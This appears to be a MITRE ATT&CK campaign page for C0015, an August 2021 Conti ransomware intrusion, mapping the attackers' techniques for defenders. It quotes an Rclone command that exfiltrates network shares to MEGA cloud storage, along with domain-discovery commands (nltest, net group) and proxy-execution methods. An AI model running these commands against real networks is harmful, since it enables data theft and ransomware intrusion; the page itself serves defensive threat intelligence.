1. Home
  2. Campaigns
  3. C0015

C0015

C0015 was a ransomware intrusion during which the unidentified attackers used Bazar, Cobalt Strike, and Conti, along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated Conti ransomware playbook based on the observed pattern of activity and operator errors.[1]

ID: C0015
First Seen:  August 2021 [1]
Last Seen:  August 2021 [1]
Contributors: Matt Brenton, Zurich Insurance Group
Version: 1.0
Created: 29 September 2022
Last Modified: 29 September 2022
Version Permalink
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1059 .003 Command and Scripting Interpreter: Windows Command Shell

During C0015, the threat actors used cmd.exe to execute commands and run malicious binaries.[1]
.005 Command and Scripting Interpreter: Visual Basic

During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.[1]
.007 Command and Scripting Interpreter: JavaScript

During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.[1]
Enterprise T1486 Data Encrypted for Impact

During C0015, the threat actors used Conti ransomware to encrypt a compromised network.[1]
Enterprise T1005 Data from Local System

During C0015, the threat actors obtained files and data from the compromised network.[1]
Enterprise T1039 Data from Network Shared Drive

During C0015, the threat actors collected files from network shared drives prior to network encryption.[1]
Enterprise T1074 .001 Data Staged: Local Data Staging

During C0015, PowerView's file share enumeration results were stored in the file c:\ProgramData\found_shares.txt.[1]
Enterprise T1030 Data Transfer Size Limits

During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.[1]

Enterprise T1482 Domain Trust Discovery

During C0015, the threat actors used the command nltest /domain_trusts /all_trusts to enumerate domain trusts.[1]
Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M.[1]
Enterprise T1083 File and Directory Discovery

During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.[1]
Enterprise T1105 Ingress Tool Transfer

During C0015, the threat actors downloaded additional tools and files onto a compromised network.[1]
Enterprise T1570 Lateral Tool Transfer

During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.[1]
Enterprise T1036 Masquerading

During C0015, the threat actors named a binary file compareForfor.jpg to disguise it as a JPG file.[1]
Enterprise T1135 Network Share Discovery

During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.[1]
Enterprise T1027 Obfuscated Files or Information

During C0015, the threat actors used Base64-encoded strings.[1]
Enterprise T1588 .001 Obtain Capabilities: Malware

For C0015, the threat actors used Cobalt Strike and Conti ransomware.[1]

.002 Obtain Capabilities: Tool

For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.[1]
Enterprise T1069 .001 Permission Groups Discovery: Local Groups

During C0015, the threat actors used the command net localgroup "adminstrator" to identify accounts with local administrator rights.[1]
.002 Permission Groups Discovery: Domain Groups

During C0015, the threat actors use the command net group "domain admins" /dom to enumerate domain groups.[1]
Enterprise T1566 .001 Phishing: Spearphishing Attachment

For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.[1]
Enterprise T1057 Process Discovery

During C0015, the threat actors used the tasklist /s command as well as taskmanager to obtain a list of running processes.[1]
Enterprise T1055 .001 Process Injection: Dynamic-link Library Injection

During C0015, the threat actors used a DLL named D8B3.dll that was injected into the Winlogon process.[1]

Enterprise T1219 Remote Access Software

During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.[1]
Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

During C0015, the threat actors used RDP to access specific network hosts of interest.[1]
Enterprise T1018 Remote System Discovery

During C0015, the threat actors used the commands net view /all /domain and ping to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.[1]
Enterprise T1553 .002 Subvert Trust Controls: Code Signing

For C0015, the threat actors used DLL files that had invalid certificates.[1]
Enterprise T1218 .005 System Binary Proxy Execution: Mshta

During C0015, the threat actors used mshta to execute DLLs.[1]
.010 System Binary Proxy Execution: Regsvr32

During C0015, the threat actors employed code that used regsvr32 for execution.[1]
.011 System Binary Proxy Execution: Rundll32

During C0015, the threat actors loaded DLLs via rundll32 using the svchost process.[1]
Enterprise T1016 System Network Configuration Discovery

During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.[1]

Enterprise T1124 System Time Discovery

During C0015, the threat actors used the command net view /all time to gather the local time of a compromised network.[1]
Enterprise T1204 .002 User Execution: Malicious File

During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.[1]
Enterprise T1047 Windows Management Instrumentation

During C0015, the threat actors used wmic and rundll32 to load Cobalt Strike onto a target host.[1]

Software

ID Name Description
S0552 AdFind

[1]
S0534 Bazar

[1]
S0154 Cobalt Strike

[1]
S0575 Conti

[1]
S1040 Rclone

[1]

References

  1. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.